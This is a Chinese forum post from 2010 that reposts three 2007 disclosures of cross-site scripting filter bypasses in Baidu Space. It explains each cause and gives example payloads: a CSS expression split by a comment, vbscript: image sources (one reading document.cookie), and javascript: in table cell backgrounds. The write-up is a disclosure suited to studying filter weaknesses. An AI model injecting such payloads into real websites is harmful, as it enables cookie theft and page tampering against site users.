WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2110查看
  • 0回复

主题

好友

2712

积分

禁止访问

发表于 2010-2-3 21:54:06 |显示全部楼层
一、
# discover by Monyer

# http://hi.baidu.com/monyer

漏洞成因:百度虽然对于插入的html标签的属性进行过滤,包括style(层叠样式表),但是并没有对混淆在样式中的注释部分进行位置检查。造成可以通过在expression中插入注释,譬如:expr/*XSS*/ession,并以此方式绕过百度的过滤系统。但是由于在IE运行时会忽略掉注释内容,使得XSS代码得以正常运行,跨站即产生

示例:<img STYLE="xss:expr/*XSS*/ession(alert(&quot;XSS&quot;))">
<div STYLE="xss:expr/*XSS*/ession(this.innerHTML=&quot;<h1> monyer</h1>&quot;)"></div>

# http://hi.baidu.com/monyer【2007-1-10】
---------------------------------------------------------------------------------------------------------------------------------------------
二、

# discover by Monyer

# http://hi.baidu.com/monyer

漏洞成因:虽然百度空间费劲心思过滤了javascript,过滤了expression,过滤了等等的一些触发事件。可是它忽略了过滤vbscript,因此造成了一个非常严重的跨站漏洞的出现

示例:<img src="vbscript:msgbox(&quot;xss&quot;)" />
<img src="vbscript:msgbox(document.cookie)" />

# http://hi.baidu.com/monyer【2007-1-10】
---------------------------------------------------------------------------------------------------------------------------------------------
三、

# discover by Monyer

# http://hi.baidu.com/monyer

漏洞成因:我们知道对于backgroud样式属性是需要嵌套url才能引用XSS代码的,如果直接把代码写进backgroud是不能运行的,因为缺少了一个触发机制。而table标签会自动加载内部内容——相当与eval。(如果你上一个比较慢的空间,并且整个空间只有一个table,那么你会发现直到整个table数据全部下载到本地才能显示网页内容,原因即是如此)

示例:<table><tr><td background="javascript:alert(/xss/)"></tr></table>

<table >
<tr >
<td background="javascript:TheId.innerHTML=%22&lt;embed src=\'URL\' height width &gt;%22" >sth or noting</td >
</tr >
</table >

# http://hi.baidu.com/monyer【2007-1-10】

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-2 16:30 , Processed in 0.055602 second(s), 16 queries .

返回顶部